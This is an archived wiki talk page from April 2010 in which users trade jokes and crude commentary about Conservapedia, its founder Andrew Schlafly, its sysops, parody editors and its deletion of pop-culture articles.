The next step is to configure ColdFusion to load the Java VM properly. This step is done from the "JVM and Java Settings" tab of the ColdFusion Administrator. Remember: my Java installation is in C:\jdk1.3.1\. If your Java installation is in a different directory, or if you are running on a non-Windows platform, you will need to set these values accordingly. More information on this can be found in the ColdFusion online documentation set "Installing and Configuring ColdFusion Server" under the topic "Basic ColdFusion Server Administration," "Extensions." (If you're running a Unix variant, you should also review our knowledgebase article 20198 at:) The settings that I used are as follows:

Java Virtual Machine Path: C:\jdk1.3.1\jre\bin\hotspot\jvm.dll
Class Path: C:\jdk1.3.1\jre\lib\

Using Java to Read the File

At this point, I will create a ColdFusion template, "javaFileTest.cfm." This template creates a Java FileReader object that allows us to read a file byte by byte. We will then pass that FileReader object to our CFBufferedReader object, and then use CFBufferedReader.readLine( ) to automagically read the file line by line. In this example, the template will read itself (using cgi.cf_template_path to get its full path and filename), and then display each line after replacing "<" with "&lt;":

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
    <title>Java File Example</title>
</head>
<body>
<!--- get our filename from the CGI environment --->
<cfset fn = cgi.cf_template_path>
<!--- create a Java FileReader object to read this file --->
<!--- note that java.io.FileReader is a native Java class. --->
<cfobject type="Java" class="java.io.FileReader" name="fr" action="create">
<!--- when calling Java from CF, the constructor is called "init()" --->
<cfset fr.init(fn)>
<!--- now pass the FileReader object to our extended BufferedReader --->
<cfobject type="Java" class="CFBufferedReader" name="reader" action="create">
<cfset reader.init(fr)>
<!--- read the first line from the file --->
<cfset curLine=reader.readLine()>
<!--- now loop until we reach the end of the file --->
<cfloop condition="not #reader.isEOF()#">
    <!--- display the current line --->
    <cfoutput>#replace(curLine,"<","&lt;","ALL")#<br></cfoutput>
    <!--- flush the output buffer (cf5 only) --->
    <cfflush>
    <!--- each call to readLine( ) reads the /next/ line, until the end of the
          file is reached, at which point isEOF( ) starts returning "true" --->
    <cfset curLine=reader.readLine()>
</cfloop>
</body>
</html>

Documentation on java.io.FileReader can be found at:

Conclusion

ColdFusion makes leveraging Java classes easy, which greatly increases the reach of what is possible from within a ColdFusion page. Additionally, we have seen that it is easy to extend native Java classes into custom subclasses that are specifically tailored to an application.
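As a supplementary sanity check that is not part of the original article, the class can also be exercised from a small standalone Java harness before it is wired into ColdFusion. The file name below is arbitrary, and the harness assumes CFBufferedReader.class is on the classpath:

import java.io.*;

public class CFBufferedReaderTest {
    public static void main(String[] args) throws IOException {
        // open any text file; this path is only an example
        FileReader fr = new FileReader("CFBufferedReader.java");
        CFBufferedReader reader = new CFBufferedReader(fr);

        String curLine = reader.readLine();
        // isEOF() only becomes true after readLine() has returned null
        while (!reader.isEOF()) {
            System.out.println(curLine);
            curLine = reader.readLine();
        }
        reader.close();
    }
}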
http://www.adobe.com/devnet/server_archive/articles/leveraging_java_classes_cf.html
crawl-002
refinedweb
1,170
56.66
I have accidentally assigned a tuple to a pyplot function (that is xticks) and the function became a tuple. Restoring its previous type as a function was not possible. Is this normal or is it considered as an issue?

import matplotlib.pyplot as plt
import matplotlib as mpl
%matplotlib inline

print mpl.__version__   # Version : 1.5.1

br = (1.0,2.0,3.0)
brand = ('Ford','Audi','Wolskvagen')
count = (100,2000,10000)

plt.xticks((1,2,3),('Ford','Audi','Wolskvagen'))
plt.scatter(x = br,y = count,c = col,s=count)

print type(plt.xticks)   #<type 'function'>

plt.xticks = ((1,2,3),('Ford','Audi','Wolskvagen'))

print type(plt.xticks)   #<type 'tuple'>
#Now, I can't use xticks function any more...

In Python, there is no such thing as a protected variable. You can write variables in the current namespace, to a module, with only a few exceptions (builtin types that are not subclassed, as well as any class that defines __slots__ (thanks Alex Hall), are the main exceptions). For example:

>>> from collections import namedtuple
>>> x = namedtuple('x', 'a b')
>>> y = x(1, 3)
>>> y.a = 3
AttributeError: 'X' object attribute 'a' is read-only
>>> a.t = 3
AttributeError: 'X' object has no attribute 't'

This is only true for a few built-in types, as well as classes that override __setattr__ in a specific manner, or that use properties with no property setter. The general rule is, anything can be written to, whether it's a class, module, function, etc. Yes, functions.

>>> def a(x):
...     pass
>>> a.b = 1
>>> a.b
1

So, how do you fix the error if you accidentally overwrite a variable in a module you imported? Either restart the Python interpreter or reload the module.

Python2 Reloading

>>> import matplotlib.pyplot as plt
>>> plt.xticks = 5
>>> plt = reload(plt)
>>> plt.xticks
<function matplotlib.pyplot.xticks>

Python3 Reloading

>>> import matplotlib.pyplot as plt
>>> import importlib
>>> plt.xticks = 5
>>> plt = importlib.reload(plt)
>>> plt.xticks
<function matplotlib.pyplot.xticks>
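One footnote on the original snippet, added here for clarity: the tick labels the question is after come from calling the function, not assigning to it. Something like the line below (using the brand tuple already defined in the question) sets the labels without rebinding the module attribute; it is the assignment form that clobbered the function and made the reload above necessary.

>>> plt.xticks((1, 2, 3), brand)   # a call: configures the ticks, leaves plt.xticks a function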
https://codedump.io/share/Zj1ApfkdaeLA/1/python-allows-assigning-tuple-to-function-xticks-of-pyplot
CC-MAIN-2016-44
refinedweb
328
70.19
#======================================================================== # # Changes # # DESCRIPTION # Revision history for the XML::Schema module. # # AUTHOR # Andy Wardley <abw@kfs.org> # # REVISION # $Id: Changes,v 1.3 2003/01/10 11:20:12 abw Exp $ #======================================================================== #------------------------------------------------------------------------ # Version 0.07 - 11th January 2003 #------------------------------------------------------------------------ * Cleaned up some of the documentation for a tentative first alpha release (at last!). #------------------------------------------------------------------------ # Version 0.06 - 20th December 2001 #------------------------------------------------------------------------ * Moved constant definitions into XML::Schema::Constants and added t/constants.t to test. * Added factory() method to XML::Schema::Base, cleaned up some further code in there, updated documentation and t/base.t tests. * Added XML::Schema::Wildcard and t/wildcard.t. At the moment this is working but the interface may change slightly pending some further investigation required into namespace processing. The process options SKIP, LAX and STRICT are supported but they currently don't have any effect as no namespace processing is performed. Note also that this implementation works only on namespace prefixes and doesn't resolve them into their actual namespace values (which it should). * Added XML::Schema::Attribute::Group and totally cleaned up and (mostly) completed the implementation of attributes, including scoped type management, relocatable attribute groups, nested groups, wildcards within nested groups, usage: OPTIONAL, REQUIRED, PROHIBIT. The only support missing is in those areas that wildcards lack, described above. Added t/attrgroup.t and various new tests to t/attribute.t * Changed attribute to perform FIXED constraint check on the post- validation, but pre-activation value. Previously, this was hacked by scheduling an instance action to check the fixed constraint. * Had a major overhaul of the documentation, correcting and completing many more pages. Still got some ay to go... #------------------------------------------------------------------------ # Version 0.05 - 19th July 2001 #------------------------------------------------------------------------ * Added the XML::Schema::Particle::Choice module to implement the choice model group. * Fixed a bug in the complex type handler which was ignoring the use of any attributes which hadn't been defined for the type. Now returns an error of the form "unexpected attribute(s): foo, bar, baz" * Added the XML::Schema::Type::Provider module to replace the Scope/Scoped modules for handling type management, but haven't yet activated it. There should (I think) be a single module to manage types, model groups, notations, attribute groups, etc. #------------------------------------------------------------------------ # Version 0.04 - 10th July 2001 #------------------------------------------------------------------------ * Added some sample templates in 'examples/templates' directory to reconstruct schema output as XML. 
#------------------------------------------------------------------------ # Version 0.03 - 10th July 2001 #------------------------------------------------------------------------ * Added ID and IDREF simple types with resolution happening via the XML::Schema::Instance object within the end_element() handler of a complex type which defines attributes of type ID and/or IDREF. #------------------------------------------------------------------------ # Version 0.02 - 10th July 2001 #------------------------------------------------------------------------ * Renamed XML::Schema::Schedule to XML::Schema::Scheduler * Added 'use' option to XML::Schema::Attribute. This should really be positioned in XML::Schema::Type::Complex but it's easier to put it in here for now. #------------------------------------------------------------------------ # Version 0.01 #------------------------------------------------------------------------ * initial version
https://metacpan.org/changes/distribution/XML-Schema
CC-MAIN-2015-32
refinedweb
471
56.66
I've attempted to create a model, which needs to pass a series of validation tests in RSpec. However, I constantly get the error

expected #<Surveyor::Answer:0x0055db58e29260 @question=#<Double Surveyor::Question>, @value=5> to respond to `valid?`

module Surveyor
  class Answer
    attr_accessor :question, :value

    def initialize(params)
      @question = params.fetch(:question)
      @value = params.fetch(:value)
    end
  end
end

module Surveyor
  class Question
    attr_accessor :title, :type

    def initialize(params)
      @title = params.fetch(:title, nil)
      @type = params.fetch(:type)
    end
  end
end

RSpec.describe Surveyor::Answer, '03: Answer validations' do
  let(:question) { double(Surveyor::Question, type: 'rating') }

  context "question validation" do
    context "when the answer has a question" do
      subject { described_class.new(question: question, value: 5) }
      it { should be_valid }
    end
  end
end

RSpec doesn't actually have a matcher called be_valid, instead it has some dynamic predicate matchers:

For any predicate method, RSpec gives you a corresponding matcher. Simply prefix the method with be_ and remove the question mark. Examples:

expect(7).not_to be_zero       # calls 7.zero?
expect([]).to be_empty         # calls [].empty?
expect(x).to be_multiple_of(3) # calls x.multiple_of?(3)

so by calling it { should be_valid }, your subject has to respond to a valid? method. If you're testing an ActiveRecord model, those have a valid? method, but your model does not. So, if you want to test that your Answer is valid, you need to decide "what is a valid answer?" and write a method that checks for those conditions. If you want an API similar to a Rails model, you might be interested in using ActiveModel::Validations
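To make that last suggestion concrete, here is one hedged sketch of how the Answer class could gain a valid? method by mixing in ActiveModel::Validations. It assumes the activemodel gem is available, and the specific validation rules are invented for the example:

require 'active_model'

module Surveyor
  class Answer
    include ActiveModel::Validations

    attr_accessor :question, :value

    # Example rules only; the real constraints depend on the survey domain.
    validates :question, presence: true
    validates :value, presence: true

    def initialize(params)
      @question = params.fetch(:question)
      @value = params.fetch(:value)
    end
  end
end

# With this mixin the subject responds to valid?, so `it { should be_valid }`
# exercises these validations instead of raising the "respond to valid?" failure.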
https://codedump.io/share/cZwz2LTbEzd3/1/what-is-39valid39-in-rspec-where-can-i-look-at-it
CC-MAIN-2021-21
refinedweb
256
51.24
7.9. Implementing Breadth First Search¶. To keep track of its progress, BFS colors each of the vertices white, gray, or black. All the vertices are initialized to white when they are constructed. A white vertex is an undiscovered vertex. When a vertex is initially discovered it is colored gray, and when BFS has completely explored a vertex it is colored black. This means that once a vertex is colored black, it has no white vertices adjacent to it. A gray node, on the other hand, may have some white vertices adjacent to it, indicating that there are still additional vertices to explore. The breadth first search algorithm shown in Listing 2 below uses the adjacency list graph representation we developed earlier. In addition it uses a Queue, a crucial point as we will see, to decide which vertex to explore next. In addition the BFS algorithm uses an extended version of the Vertex class. This new vertex class adds three new instance variables: distance, predecessor, and color. Each of these instance variables also has the appropriate getter and setter methods. The code for this expanded Vertex class is included in the pythonds package, but we will not show it to you here as there is nothing new to learn by seeing the additional instance variables. BFS begins at the starting vertex s and colors start gray to show that it is currently being explored. Two other values, the distance and the predecessor, are initialized to 0 and None respectively for the starting vertex. Finally, start is placed on a Queue. The next step is to begin to systematically explore vertices at the front of the queue. We explore each new node at the front of the queue by iterating over its adjacency list. As each node on the adjacency list is examined its color is checked. If it is white, the vertex is unexplored, and four things happen: The new, unexplored vertex nbr, is colored gray. The predecessor of nbris set to the current node currentVert The distance to nbris set to the distance to currentVert + 1 nbris added to the end of a queue. Adding nbrto the end of the queue effectively schedules this node for further exploration, but not until all the other vertices on the adjacency list of currentVerthave been explored. Listing 2 from pythonds.graphs import Graph, Vertex from pythonds.basic import Queue def bfs(g,start): start.setDistance(0) start.setPred(None) vertQueue = Queue() vertQueue.enqueue(start) while (vertQueue.size() > 0): currentVert = vertQueue.dequeue() for nbr in currentVert.getConnections(): if (nbr.getColor() == 'white'): nbr.setColor('gray') nbr.setDistance(currentVert.getDistance() + 1) nbr.setPred(currentVert) vertQueue.enqueue(nbr) currentVert.setColor('black') Let’s look at how the bfs function would construct the breadth first tree corresponding to the graph in Figure 1. Starting from fool we take all nodes that are adjacent to fool and add them to the tree. The adjacent nodes include pool, foil, foul, and cool. Each of these nodes are added to the queue of new nodes to expand. Figure 3 shows the state of the in-progress tree along with the queue after this step. In the next step bfs removes the next node (pool) from the front of the queue and repeats the process for all of its adjacent nodes. However, when bfs examines the node cool, it finds that the color of cool has already been changed to gray. This indicates that there is a shorter path to cool and that cool is already on the queue for further expansion. The only new node added to the queue while examining pool is poll. 
The new state of the tree and queue is shown in Figure 4. The next vertex on the queue is foil. The only new node that foil can add to the tree is fail. As bfs continues to process the queue, neither of the next two nodes adds anything new to the queue or the tree. Figure 5 shows the tree and the queue after expanding all the vertices on the second level of the tree.

You should continue to work through the algorithm on your own so that you are comfortable with how it works. Figure 6 shows the final breadth first search tree after all the vertices in Figure 3 have been expanded.

The amazing thing about the breadth first search solution is that we have not only solved the FOOL–SAGE problem we started out with, but we have solved many other problems along the way. We can start at any vertex in the breadth first search tree and follow the predecessor arrows back to the root to find the shortest word ladder from any word back to fool. The function below (Listing 3) shows how to follow the predecessor links to print out the word ladder.

Listing 3

def traverse(y):
    x = y
    while (x.getPred()):
        print(x.getId())
        x = x.getPred()
    print(x.getId())

traverse(g.getVertex('sage'))
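To tie the pieces together, here is a brief, hedged sketch of how these functions might be invoked, assuming the buildGraph helper developed earlier in the word ladder discussion (the word list file name here is hypothetical):

wordgraph = buildGraph('fourletterwords.txt')   # hypothetical word file
bfs(wordgraph, wordgraph.getVertex('fool'))     # grow the breadth first tree from 'fool'
traverse(wordgraph.getVertex('sage'))           # print the ladder from 'sage' back to 'fool'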
https://runestone.academy/runestone/books/published/pythonds/Graphs/ImplementingBreadthFirstSearch.html
CC-MAIN-2019-35
refinedweb
828
73.27
This Post

The point I'd like to get across in this post is why I structure React components the way that I do for this architecture. It pairs nicely with the Director configuration we set up in Part 2, and it allows me to get content up and running quickly. The spirit of this series is, "I want a thing up and running immediately and don't want the overhead of a flux framework." So the overhead of a flux framework, GraphQL/Relay layer, complex webpack configuration, etc. just isn't worth it (right now). FWIW, an app that I'm working on is using this implementation for its "Is this a good idea?" phase and, if the answer to that is yes, moving to a more traditional Redux stack will be a necessity.

Containers vs. Components vs. Smart vs. Dumb

Before reading on, I recommend reading Dan Abramov's post about Presentation vs Container Components (…). I posted this recommendation in Part 2 as well. When I first started writing React code, I had an almost identical idea (although not nearly as well articulated or functionally correct) that I referred to as Smart vs Dumb components (which Dan brings up in his post). I like the idea a lot, and I think it's an excellent introduction to React coding. The concepts emerge naturally and the code separation is easy to navigate, as well as easy to jump into. In short:

•A smart component knows about its state. It can initialize, fetch, and update its own state. It will pass state values to children as props. These are sometimes not reusable.
•A dumb component does not know about state. It receives data and renders it via props. Dumb components should always be reusable, as they are not coupled to an implementation or valueset.

In my code/codebases, I use "Container" and "Component" to reference Smart and Dumb components. Containers contain various amalgamations of components. An example:

//A component/dumb component
import React from 'react';
import ReactDOM from 'react-dom';

export const ContentSection = React.createClass({
  render() {
    return null; // the JSX markup was stripped from the original post
  }
});

In the above component, there is no need for getInitialState or any logic other than render; as the component is dumb, it is prop driven. Another example:

//Another dumb component
import React from 'react';
import ReactDOM from 'react-dom';

const Comment = React.createClass({
  render() {
    return null; // the JSX markup was stripped from the original post
  }
});

Here we have a styled, standardized Comment component that is driven by its parent. This Comment can work with whatever context it lives in, as it is props-driven. Now these have both been very basic examples, but for the most part dumb components should be pretty simple to reason about anyway. They're dumb. They don't contain logic or understand why they exist, they just exist. That's why dumb components are entirely reusable: they fundamentally can't be coupled to an implementation, as they have no implementation. They really just serve their Containers.

So, Containers. Containers can be large and complex. Sometimes Containers aren't reusable, which is (for the most part) fine. Containers can be reused if their implementation exists in multiple contexts. Think of Facebook. You can comment on a friend's status update via your own feed, or by going directly to their page and viewing the status update there. In both contexts, the comment will be hitting the same API endpoints, solving the same problem, and managing the exact same state (a comment on a status update).
Because of this, a Comment Container that knows about its children, knows about API endpoints, and knows about its implementation (in this example, a Status Update) can be reused. Another basic example:

//A container
const SomeContainer = React.createClass({
  getInitialState() {
    return {
      comment: ''
    };
  },
  change(event) {
    this.setState({
      comment: event.target.value
    }, Services.updateCommentService);
  },
  render() {
    return null; // the JSX markup was stripped from the original post
  }
});

This is an extremely basic example that doesn't really do stateful components justice, but the idea is good. The Comment logic doesn't need to be muddled with the other Container/Component logic, the Container can know about the service/endpoint that needs to get updated for that specific comment, and adding new components to the Container is super easy and doesn't interfere with the logic of the rest of the implemented components.

printState

A helper function I wrote has turned out to be extremely useful for me while in development. When a React component calls setState, the state is not updated immediately, so the following code will not work as expected:

change(event) {
  this.setState({
    comment: event.target.value
  });
  console.log('STATE', this.state);
}

However, setState takes an optional callback as a second argument, which will be executed after the state has been updated. So, the helper function:

function printState() {
  console.log('STATE', this.state);
}

This function will run with the state of whatever component it is applied to (because of how the this keyword works). So nearly every time I call setState, I pass it in after the state object just to see what's happening. For complex Containers that have multiple sub-components, it's a great way to see how your overall state object is mutating. It seems small, but it has saved me a lot of time. After all, state management is one of the hardest things to get right during UI development.

HOW DOES THIS YAGNI?!

So this post has been about React code creation (I lied earlier, I guess). Hopefully, when I write Part 4 (tying it all together), if Director + Webpack have been configured as directed (pun intended), the app just falls into place. Next post, we'll go over how Containers/Components play into the Director + Webpack + React + Superagent configuration, and also probably go over a services layer to interact with the rendering layer. A fiddle!:

Learn more about JavaScript in our JavaScript Blog Archive.
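As a minimal, hedged sketch of how the helper gets wired in (component and field names reuse the hypothetical SomeContainer example above, and, as the post describes, the callback runs with this bound to the component):

function printState() {
  console.log('STATE', this.state);
}

const SomeContainer = React.createClass({
  getInitialState() {
    return { comment: '' };
  },
  change(event) {
    // printState fires after the state update completes, so it logs the fresh state
    this.setState({ comment: event.target.value }, printState);
  },
  render() {
    return null; // markup omitted; not relevant to the sketch
  }
});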
https://www.metaltoad.com/blog/reactjs-architecture-part-3
CC-MAIN-2020-16
refinedweb
969
55.34
On Fri, Feb 24, 2012 at 08:25:30PM -0800, Arve Hjønnevåg wrote:
> On Thu, Feb 23, 2012 at 9:16 PM, Matt Helsley <matthltc@us.ibm.com> wrote:
> >
> > This is an interesting idea, but I'm not sure how well it would work.
>
> I looked at the epoll code and it looks like it is possible to
> activate the wakeup-source from the wait queue function it uses. The
> epoll callback will happen without holding evdev client buffer_lock,
> so the wakeup-source and buffer state will not always be in sync (this
> may be OK, but require more thought). This callback is also called if
> no data was added to the queue we are polling on because another
> client has grabbed the input device (is this a bug or intended?).
>
> There is no call into the epoll code when input queue is emptied, so
> we can't deactivate the wakeup-source until epoll_wait is called
> again. This also should be workable, but result in different stats.
>
> It does not look like the normal poll and select interfaces can be
> extended the same way (since they remove themselves from the
> wait-queue before returning to user-space), so user-space has to be

Yup, that is exactly why epoll is so well suited to this.

> changed to use epoll even if select or poll would be a better fit.

Either way, modification of application code is necessary, right?

> I don't know how many other drivers this would work for. The input
> driver will wake up user-space from the same thread or interrupt
> handler that queued the event, but other drivers may defer this to
> another thread which makes an epoll wakeup-source insufficient.

I don't understand how this would be insufficient. So long as the
interrupt causes the wakeup source to prevent the machine from suspending
before finishing interrupt handling does it matter whether the event
handling itself is deferred?

In case there's some confusion: I'm not saying that this idea will solve
all of the problems, especially:

[quoted text garbled in the original]

> > ...
> >> + snprintf(name, sizeof(name), "%s-%d",
> >> +          dev_name(&evdev->dev), task_tgid_vnr(current));
> >
> > This does not look like it will work well with tasks in different pid
> > namespaces. What should happen, I think, is the wakeup_source should hold a
> > reference to either the struct pid of current or current itself. Then
> > when someone reads the file you should get the pid vnr in the reader's
> > pid namespace. That way instead of a bogus pid vnr 0 would show up if
> > "current" here is not in the reader's pid namespace.
>
> The pid here is only used for debugging purposes, and used less than
> the dev_name. I don't think tracking pid namespaces is worth the
> trouble here, so if this is a real problem we can just drop the pid
> from the name for now.

I think dropping the pid would be the best choice. If it's absolutely
necessary in the output then it should be made to work with pid namespaces
because the interface will be maintained forever.

Cheers,
    -Matt
https://lkml.org/lkml/2012/2/27/522
CC-MAIN-2020-50
refinedweb
535
68.3
From: Jaap Suter (J.Suter_at_[hidden])
Date: 2003-03-09 20:37:18

> Then how about simply:
>
> #ifndef STATIC_NDEBUG
> #  define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(e)
> #else
> #  define BOOST_STATIC_ASSERT2(e)
> #endif

I guess that ';' would work in most cases. I can't think of a case where it wouldn't, although it can give warnings on some compilers (try closing a namespace with curly-brace-semi-colon on some compilers).

Alternatively, we could use:

> #ifndef STATIC_NDEBUG
> #  define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(e)
> #else
> #  define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(true)
> #endif

I'm wondering why we want to make this a 2nd static_assert at all. It seems to me that once we acknowledge that a compile-time program 'runs' at compile time, we have a compile-time 'debug' and 'release' mode with the accompanying debug and release versions of the compile-time assert.

I would like to see the primary STATIC_ASSERT defined this way, but that's just me of course :).

Regards,

Jaap Suter

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
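For context, a rough sketch of how the macro under discussion would behave in user code (BOOST_STATIC_ASSERT2 is only the name proposed in this thread, not an actual Boost macro):

#include <boost/static_assert.hpp>

#ifndef STATIC_NDEBUG
#  define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(e)
#else
#  define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(true)
#endif

template <typename T>
struct small_buffer {
    // Checked only in compile-time "debug" builds; reduces to a trivially
    // true assertion when STATIC_NDEBUG is defined.
    BOOST_STATIC_ASSERT2(sizeof(T) <= 16);
    T value;
};

int main() {
    small_buffer<int> b;
    (void)b;
    return 0;
}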
https://lists.boost.org/Archives/boost/2003/03/45439.php
CC-MAIN-2019-30
refinedweb
181
64.3
So I tidied the code up a bit from last time; no more for loop. Actually, I tidied it up a lot. My goal had been to arrange the data in such a way that I could get a simple moving average of the score difference for each team. That wound up being a semi-lengthy process. So, now, I have a function which will return the game results for a single season (readHTMLTable comes from the XML package and mdy from lubridate, so both packages need to be loaded first):

# library(XML); library(lubridate)   # needed for readHTMLTable() and mdy()
GetSeasonResults = function(year) {
  games.URL.stem = ""   # base URL stripped from the original post
  URL = paste(games.URL.stem, year, "/games.htm", sep="")
  games = readHTMLTable(URL)
  dfSeason = games[[1]]

  # Clean up the df
  dfSeason = subset(dfSeason, Week!="Week")
  dfSeason = subset(dfSeason, Week!="")
  dfSeason$Date = as.character(dfSeason$Date)
  dfSeason$GameDate = mdy(paste(dfSeason$Date, year), quiet=T)
  year(dfSeason$GameDate) = with(dfSeason, ifelse(month(GameDate) <= 6, year(GameDate)+1, year(GameDate)))
  dfSeason = dfSeason[,c(14, 1, 5, 7, 8, 9)]
  colnames(dfSeason) = c("GameDate", "Week", "Winner", "Loser", "WinnerPoints", "LoserPoints")
  dfSeason$Winner = as.character(dfSeason$Winner)
  dfSeason$Loser = as.character(dfSeason$Loser)
  dfSeason$WinnerPoints = as.integer(as.character(dfSeason$WinnerPoints))
  dfSeason$LoserPoints = as.integer(as.character(dfSeason$LoserPoints))
  dfSeason$ScoreDifference = dfSeason$WinnerPoints - dfSeason$LoserPoints
  dfSeason = subset(dfSeason, !is.na(ScoreDifference))
  return(dfSeason)
}

This means that I may now lapply to get a set of results for many seasons. However, this still isn't quite what I want. What I'm after is a set of results for an individual team. To do this, I created a function which will zip through the games data to pull out results for a single team. The games data is structured such that a team could appear in either the winner or loser column. I've handled this by making two passes through the dataframe. The first pass picks up all the times that the team won, the second picks up all the times the team lost. I then just bind the winning and losing dataframes together.

BuildTeamData = function(Team, dfGamesData) {
  dfWinner = dfGamesData[which(dfGamesData$Winner == Team), c("GameDate", "Week", "Loser", "ScoreDifference")]
  dfLoser = dfGamesData[which(dfGamesData$Loser == Team), c("GameDate", "Week", "Winner", "ScoreDifference")]
  dfLoser$ScoreDifference = -dfLoser$ScoreDifference
  colnames(dfWinner) = c("GameDate", "Week", "OpposingTeam", "ScoreDifference")
  colnames(dfLoser) = c("GameDate", "Week", "OpposingTeam", "ScoreDifference")
  dfTeam = rbind(dfWinner, dfLoser)
  dfTeam$ThisTeam = Team
  dfTeam = dfTeam[order(dfTeam$GameDate),]
  return (dfTeam)
}

The result is a dataframe with twice as many rows as the original set of game data (each winner and loser gets its own row). However, it winds up being an intuitive way to view the results for an individual team. I can now take a moving average of the point differential to use as a predictor of whether or not they're likely to win. The algorithm is (at the moment) incredibly simple. If a team's average point differential is larger than their opponent's, I presume that they will win. Does something this straightforward work? Well, sort of. I used a period of between 9 and 16 prior games, and also monkeyed around with capping the absolute value of the point differential and applying an exponential smoother so that more recent games would get more weight. The result? If you take the average point differential for the past 10 games and compare, you'll forecast the winner about 62% of the time. This is hardly something to get excited about, but it's reliably better than a coin toss.
I'm struck by the fact that smoothing and point capping don't improve the model all that much (results posted at some later time). My intuition is that recent performance takes personnel changes and team morale into account and that a blowout of a weak opponent ought to count for little in predicting the result of a different game. Perhaps these things do matter when other elements of data are introduced, but at present they don't influence the algorithm all that much. I've used this method for two weeks and I've predicted the winner about 60% of the time (again, actual results to appear in a later post). Given how little opportunity I have to keep up with players and what's going on, this is high enough to keep things interesting for me. I've downloaded the NFL mobile app and look forward to exploring what other information can improve this method. Next step is to see whether offensive and defensive stats are at all useful in predicting a result. I can't imagine anyone is reading this, but there's loads more code to generate the moving averages and test the results of the model. It's available to anyone who'd care to...
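The rolling-average step itself isn't shown in the post, but a hedged sketch of the idea (reusing BuildTeamData and the ScoreDifference column from above; the 10-game window and the comparison rule are the ones described in the text) might look like this:

# Trailing average of point differential over the last n games for one team
TrailingAvg = function(dfTeam, n = 10) {
  k = nrow(dfTeam)
  recent = dfTeam$ScoreDifference[max(1, k - n + 1):k]
  mean(recent)
}

# Naive prediction: the team with the larger trailing average is forecast to win
PredictWinner = function(teamA, teamB, dfGamesData) {
  avgA = TrailingAvg(BuildTeamData(teamA, dfGamesData))
  avgB = TrailingAvg(BuildTeamData(teamB, dfGamesData))
  if (avgA >= avgB) teamA else teamB
}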
https://www.r-bloggers.com/nfl-prediction-algorithm-1/
CC-MAIN-2016-44
refinedweb
763
55.03
6 Easy Steps to Get Started with MVC Module Development in DNN 8

August Karlstedt | 10/28/2016

In the beginning of the year, DNN (formerly DotNetNuke) was updated to support MVC modules. ASP.NET MVC is the flavor of ASP.NET in which the Model-View-Controller paradigm is at the core. This article won't be a look into what MVC is or a comparison with WebForms, but instead will give a quick guide to starting DNN MVC module development. While there are some guides available that give you similar information, I found it a bit difficult to get started developing MVC modules in DNN. For reference, the articles I used are at the bottom of this blog.

Here's an overview of the steps we'll take to get started:

1. Prerequisites
2. Templates
3. Setup
4. Build
5. Installation
6. Next Steps
7. References

1. Prerequisites

For this quick start, you'll need a few things before we can dive in. First, you'll need to have Visual Studio 2015 installed. The Express editions have been reported to be incompatible with the templates we'll be using later, but this may not be true by the time you're reading this. Next, you'll need to have IIS (Internet Information Services) set up with a local installation of DNN (version 8 or higher). There are many tutorials on how to do this around the web. You'll need to install IIS and Microsoft SQL Server, then you can install DNN by downloading the latest _install.zip from DNN's GitHub releases. Once those are all set up, you're ready to go.

2. Templates

You could create a module from scratch. But why would you do that when a DNN expert created templates for you to use? Download the templates from the Visual Studio Gallery and run through the installation procedure.

3. Setup

Now that everything is set up, we can actually dive into creating the module. In Visual Studio, select File -> New -> Project. In the New Project window, select Templates -> Visual C# -> DotNetNuke and you'll see a listing of the types of projects the templates have provided. To create an MVC module, we'll select DotNetNuke 8 C# DAL2 MVC Module. There are three other fields we must configure: Name, Location, and Solution name.

Name: Enter a name for your project (it's best not to use any spaces or special characters for this).

Location: It is important to point this to the correct folder in DNN: /DesktopModules/MVC/. Depending on your installation directory, the folder should be something like C:\Dev\Projects\DMC_Website\Alpha\DesktopModules\MVC\ where "Alpha" is the root of your DNN installation.

Solution name: We're not actually going to be using this field. Uncheck the box on the right that says "Create directory for solution" and the solution name textbox will be greyed out.

Confirm your settings look similar to mine and then click OK. A Project Setup Wizard dialog box will appear asking for some project information. Many of these are self explanatory, so I will only address the two that are a bit tricky.

Namespace: Whatever namespace you want your module to live in. The templates will automatically include your project name in the namespace, so no need to enter it here. Make sure you include the last period. E.g. DMC.

Local Dev URL: By default this is set up to point to dnndev.me, which is actually set up to point back to 127.0.0.1 (your localhost). What you enter here depends on what settings you've set your DNN install up with. For my installation, I access my local DNN install through http://localhost.
Therefore, I am going to enter localhost as my Local Dev URL.

Initial values
Updated values (note: the Owner Website field includes https:// but the textbox isn't large enough to display it. Be sure to include it in your URL.)

Once all fields have been completed, click OK.

4. Build

Now that the initial project setup is complete, you'll be presented with a web page in Visual Studio that says * Important *. These are steps that you should read carefully and follow to ensure your project will work correctly. I'll provide a quick overview of these steps in case the original wording is confusing for anyone.

First, check IIS to see if any of your folders were converted to virtual directories or applications. To do this, open IIS, expand your site's dropdown and check what icon is displayed next to your DesktopModules folder or the MVC folder inside of the DesktopModules folder. If it's anything other than a yellow folder, right-click it and click Remove.

Next, in Visual Studio, right-click and delete the web.config files that are in the solution.

You can now build the module! Change the solution configuration dropdown from Debug to Release and then select Build -> Build. You'll get an install .zip file in your module's install/ directory.

5. Installation

Now, in DNN, go to Hosts -> Extensions and click Install Extension, selecting the install .zip file that you previously built. If everything goes well, then the module is now installed and can be placed on any page.

6. Next Steps

Once you've dragged the module into a page, you'll see a demo application that includes multiple views, database interaction, and more. Simply build the project in debug mode to automatically copy the new DLL to the /bin folder.

7. References

While you're here, check out DMC's Web Application Development and ASP.NET & ASP.NET MVC Development services so we can get started on your next DNN MVC module!

Comments

# August Karlstedt, Friday, October 28, 2016 12:30 PM
Be sure to post a comment if you have any issues!
https://www.dmcinfo.com/latest-thinking/blog/id/9305/6-easy-steps-to-get-started-with-mvc-module-development-in-dnn-8
CC-MAIN-2021-43
refinedweb
1,007
65.01
Created on 2014-07-30 17:10 by jj, last changed 2014-08-01 13:07 by zach.ware. This issue is now closed.

The documentation and the code example for embedding:

#include <Python.h>

int main(int argc, char *argv[])
{
  Py_SetProgramName(argv[0]);  /* optional but recommended */
  Py_Initialize();
  PyRun_SimpleString("from time import time,ctime\n"
                     "print('Today is', ctime(time()))\n");
  Py_Finalize();
  return 0;
}

